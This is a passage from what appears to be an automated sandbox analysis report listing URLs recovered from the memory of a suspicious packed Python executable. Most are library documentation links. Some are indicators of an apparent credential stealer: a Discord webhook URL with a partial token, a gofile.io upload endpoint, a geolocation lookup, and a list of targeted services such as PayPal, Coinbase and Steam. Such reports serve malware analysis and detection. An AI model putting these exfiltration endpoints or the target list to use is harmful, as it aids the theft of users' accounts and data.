http://json.org	322pVOVprx.exe, 00000001.00000003.360680372.0000023E95F8B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359522305.0000023E9618D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/pprint.html	322pVOVprx.exe, 00000001.00000003.344180227.0000023E95991000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354941347.0000023E95992000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353530096.0000023E95992000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/actions?query=workflow%3A%22tests%22	322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	322pVOVprx.exe, 00000001.00000003.302256501.0000023E93B18000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.369427040.0000023E95358000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.302368093.0000023E93B0C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/get	322pVOVprx.exe, 00000001.00000003.338938047.0000023E96A4E000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.362042314.0000023E96972000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343563449.0000023E96A53000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353899418.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347749361.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349566837.0000023E9614D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.362042314.0000023E9698F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344522145.0000023E96136000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349238498.0000023E96A59000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340931205.0000023E960C9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.342101286.0000023E960D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357442719.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357714160.0000023E9698F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356087969.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354989882.0000023E9617F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349238498.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gmail.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://httpbin.org/	322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349566837.0000023E9614D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344522145.0000023E96136000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340931205.0000023E960C9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.342101286.0000023E960D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359054877.0000023E96173000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349804130.0000023E96170000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353060804.0000023E96172000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340131521.0000023E960B1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356511672.0000023E9698D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paypal.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access	322pVOVprx.exe, 00000001.00000003.307927048.0000023E95F3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307754491.0000023E95AE4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351151746.0000023E95F3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.348826393.0000023E95F30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345409708.0000023E95F25000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.308227560.0000023E95F3A000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307595748.0000023E95F17000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347788387.0000023E95F2F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347147894.0000023E95F2B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344269479.0000023E95ECF000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309407108.0000023E95F0B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307595748.0000023E95EC8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://uber.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://coinbase.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	322pVOVprx.exe, 00000001.00000003.368842470.0000023E9578C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.302256501.0000023E93B18000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.304897234.0000023E95786000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344669679.0000023E95765000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370067685.0000023E9578C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.350317626.0000023E95789000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345603847.0000023E95775000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.348047116.0000023E95786000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.304565097.0000023E95782000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.302368093.0000023E93B0C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345673018.0000023E93ABC000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.369138741.0000023E93AC0000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.368548378.0000023E9578B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.362948790.0000023E93ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://geolocation-db.com/jsonp/z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/	322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349566837.0000023E9614D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344522145.0000023E96136000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340931205.0000023E960C9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.342101286.0000023E960D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359054877.0000023E96173000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349804130.0000023E96170000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353060804.0000023E96172000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340131521.0000023E960B1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356511672.0000023E9698D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wwww.certigna.fr/autorites/	322pVOVprx.exe, 00000001.00000003.338425769.0000023E96C74000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338217959.0000023E96C62000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://codecov.io/gh/pypa/setuptools	322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp	false		high
https://roblox.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	322pVOVprx.exe, 00000001.00000003.307927048.0000023E95F3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307927048.0000023E95EC8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307987697.0000023E95F42000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hbo.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://binance.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	322pVOVprx.exe, 00000001.00000003.348277479.0000023E967E2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357501020.0000023E96826000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349409786.0000023E96822000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355469303.0000023E96824000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	322pVOVprx.exe, 00000001.00000003.368842470.0000023E9578C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.302256501.0000023E93B18000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.304897234.0000023E95786000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344669679.0000023E95765000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370067685.0000023E9578C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.350317626.0000023E95789000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345603847.0000023E95775000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.348047116.0000023E95786000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.304565097.0000023E95782000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.302368093.0000023E93B0C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345673018.0000023E93ABC000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.369138741.0000023E93AC0000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.368548378.0000023E9578B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.362948790.0000023E93ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitter.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://docs.python.org/3/library/re.html	322pVOVprx.exe, 00000001.00000003.360078794.0000023E95AF1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344669679.0000023E957A4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.352292036.0000023E95FD4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347985009.0000023E95FB2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E95FAC000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370175258.0000023E957DA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347844833.0000023E957AD000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349323854.0000023E957B5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.352559577.0000023E95AF1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373501171.0000023E96340000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345409708.0000023E95F25000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343024871.0000023E95A05000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.372718665.0000023E95F2D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373965386.0000023E96640000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349356307.0000023E957B9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353103508.0000023E957CA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347147894.0000023E95F2B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.350749759.0000023E95FC0000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344269479.0000023E95ECF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/issues/417#issuecomment-392298401	322pVOVprx.exe, 00000001.00000002.370996657.0000023E95C00000.00000004.00001000.00020000.00000000.sdmp	false		high
http://github.com/ActiveState/appdirs	322pVOVprx.exe, 00000001.00000003.344669679.0000023E95765000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355652962.0000023E95798000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.350317626.0000023E95789000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345603847.0000023E95775000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.371492201.0000023E95D20000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.348047116.0000023E95786000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wiki.debian.org/XDGBaseDirectorySpecification#state	322pVOVprx.exe, 00000001.00000003.347809627.0000023E9570C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349051665.0000023E95718000.00000004.00000020.00020000.00000000.sdmp	false		high
http://wwwsearch.sf.net/):	322pVOVprx.exe, 00000001.00000003.359301387.0000023E96970000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tiktok.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://bugs.python.org/issue44497.	322pVOVprx.exe, 00000001.00000002.373501171.0000023E96340000.00000004.00001000.00020000.00000000.sdmp	false		high
https://origin.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://telegram.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://riotgames.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://canary.discord.com/api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKl	322pVOVprx.exe, 00000001.00000003.360977811.0000023E967D7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://playstation.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://packaging.python.org/specifications/entry-points/	322pVOVprx.exe, 00000001.00000002.373655740.0000023E96440000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373965386.0000023E96640000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/jaraco/jaraco.functools/issues/5	322pVOVprx.exe, 00000001.00000002.373364941.0000023E96220000.00000004.00001000.00020000.00000000.sdmp	false		high
https://pornhub.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	322pVOVprx.exe, 00000001.00000003.362948790.0000023E93ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	322pVOVprx.exe, 00000001.00000003.307927048.0000023E95F3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307927048.0000023E95EC8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307987697.0000023E95F42000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rfc-editor.org/info/rfc7253	322pVOVprx.exe, 00000001.00000003.355166441.0000023E96B6B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343437448.0000023E96B6A000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.360590071.0000023E96B6B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp	false		high
http://bugs.python.org/issue23606)	322pVOVprx.exe, 00000001.00000003.348086365.0000023E969B2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340388146.0000023E969B2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf	322pVOVprx.exe, 00000001.00000003.353001105.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347749361.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343563449.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.358820202.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355166441.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356087969.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359464370.0000023E96B5D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349238498.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.360590071.0000023E96B5E000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.362209360.0000023E96B5E000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344775176.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357019176.0000023E96B48000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357019176.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	322pVOVprx.exe, 00000001.00000002.374418147.0000023E96922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/installing/	322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.com)z	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://google.com/	322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354100842.0000023E968C7000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339805348.0000023E9689F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356593337.0000023E961FA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340079077.0000023E961F5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349566837.0000023E9614D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349070461.0000023E968BD000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96847000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344522145.0000023E96136000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340931205.0000023E960C9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.342101286.0000023E960D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356264962.0000023E968C8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339344619.0000023E961F4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E9683B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359054877.0000023E96173000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349804130.0000023E96170000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353060804.0000023E96172000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E9684D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mahler:8092/site-updates.py	322pVOVprx.exe, 00000001.00000003.357442719.0000023E96855000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96847000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374418147.0000023E96922000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E9683B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353899418.0000023E96848000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353952021.0000023E96854000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E96855000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374217692.0000023E96856000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.gofile.io/getServerr	322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc5869	322pVOVprx.exe, 00000001.00000002.374679366.0000023E96B90000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339187150.0000023E96B8B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357206780.0000023E95E63000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95E3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B81000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354683376.0000023E95E4F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314334737.0000023E95E41000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/psf/black	322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/download/releases/2.3/mro/.	322pVOVprx.exe, 00000001.00000003.301375405.0000023E95733000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.301438496.0000023E95733000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.369427040.0000023E952D0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html	322pVOVprx.exe, 00000001.00000003.339187150.0000023E96B8B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357929607.0000023E95FA4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353001105.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349409786.0000023E9682C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347749361.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353795266.0000023E9682C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343563449.0000023E96B57000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.358820202.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B47000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355166441.0000023E96B58000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95E3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 